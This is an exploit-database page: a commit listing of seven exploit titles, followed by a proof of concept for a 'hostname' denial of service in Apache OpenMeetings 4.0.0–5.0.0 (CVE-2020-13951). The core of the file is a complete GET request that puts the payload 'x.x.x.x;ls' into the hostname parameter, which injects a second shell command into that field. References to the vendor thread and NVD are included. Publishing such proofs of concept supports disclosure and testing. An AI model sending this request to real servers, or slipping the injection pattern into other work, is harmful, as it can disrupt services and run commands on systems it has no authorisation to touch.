a41b8b4637
7 changes to exploits/shellcodes docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter) nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit) Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated) OpenCart 3.0.3.6 - 'Profile Image' Stored Cross-Site Scripting (Authenticated) OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting
20 lines
No EOL
1.3 KiB
Text
20 lines
No EOL
1.3 KiB
Text
# Exploit Title: Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service
|
|
# Google Dork: "Apache OpenMeetings DOS"
|
|
# Date: 2020-08-28
|
|
# Exploit Author: SunCSR (ThienNV - Sun* Cyber Security Research)
|
|
# Vendor Homepage: https://openmeetings.apache.org/
|
|
# Software Link: https://openmeetings.apache.org/
|
|
# Version: 4.0.0 - 5.0.0
|
|
# Tested on: Windows
|
|
# CVE: CVE-2020-13951
|
|
|
|
- POC:
|
|
# Vulnerability variable: hostname
|
|
# Payload: x.x.x.x;ls
|
|
# Request exploit:
|
|
|
|
GET /openmeetings/wicket/bookmarkable/org.apache.openmeetings.web.pages.HashPage?3-1.0-panel~main&app=network&navigatorAppName=Netscape&navigatorAppVersion=5.0 (Windows)&navigatorAppCodeName=Mozilla&navigatorCookieEnabled=true&navigatorJavaEnabled=false&navigatorLanguage=en-US&navigatorPlatform=Win32&navigatorUserAgent=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0&screenWidth=1920&screenHeight=1080&screenColorDepth=24&jsTimeZone=Asia/Ho_Chi_Minh&utcOffset=7&utcDSTOffset=7&browserWidth=1920&browserHeight=966&hostname=x.x.x.x;ls&codebase=https://x.x.x.x:5443/openmeetings/hash&settings=[object Object]&_=1597801817026
|
|
|
|
- Reference:
|
|
https://lists.apache.org/thread.html/re2aed827cd24ae73cbc320e5808020c8d12c7b687ee861b27d728bbc%40%3Cuser.openmeetings.apache.org%3E
|
|
https://nvd.nist.gov/vuln/detail/CVE-2020-13951 |